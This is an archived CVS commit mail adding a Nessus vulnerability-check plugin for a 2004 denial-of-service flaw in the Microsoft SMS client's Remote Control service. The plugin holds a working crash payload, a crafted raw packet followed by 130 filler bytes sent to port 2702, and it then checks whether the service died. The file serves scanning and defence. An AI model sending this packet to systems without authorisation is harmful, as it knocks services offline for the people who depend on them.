nessus-plugins/scripts mssms_dos.nasl,NONE,1.1



Update of /usr/local/cvs/nessus-plugins/scripts
In directory raccoon.nessus.org:/tmp/cvs-serv60956

Added Files:
	mssms_dos.nasl 
Log Message:
added

--- NEW FILE: mssms_dos.nasl ---
#
# Noam Rathaus
#
# Subject: Denial of Service (DoS) in Microsoft SMS Client
# From: vuln_at_hexview.com
# Date: 14.7.2004 21:45

if(description)
{
 script_id(13752);
 
 name["english"] = "Denial of Service (DoS) in Microsoft SMS Client";
 
 script_name(english:name["english"]);
 
 desc["english"] = "
Microsoft Systems Management Server provides configuration management
solution for Windows platform. It is widely deployed in medium and large
network environments. A flaw in SMS Remote Control service makes possible to
crash the service remotely leading to the DoS condition.

Affected products:
All tests were performed on a client part of Microsoft Systems Management
Server version 2.50.2726.0.

Risk factor : Medium";

 script_description(english:desc["english"]);
 
 summary["english"] = "Detect the vulnerability of SMS Client";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_DESTRUCTIVE_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2004 Noam Rathaus");
 family["english"] = "Denial of Service"; 

 script_family(english:family["english"]);
 script_require_ports(2702);
 exit(0);
}

debug = 0;

port = 2702;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  req = raw_string(0x52, 0x43, 0x48, 0x30, 0x16, 0x00, 0x40, 0x00, 0x52, 0x43, 0x48, 0x45);
  req = string(req, crap(data:raw_string(0x58), length:130));

  if (debug)
	{
   display("req: ", req, "\n");
	}
	
  send(socket:soc, data:req);
  sleep(1);

  close(soc);

	soc = open_sock_tcp(port);
	if (!soc)
	{
	 security_hole(port:port);
	}
 }
}






This archive was generated by a fusion of Pipermail 0.09 (Mailman edition) and MHonArc 2.6.8.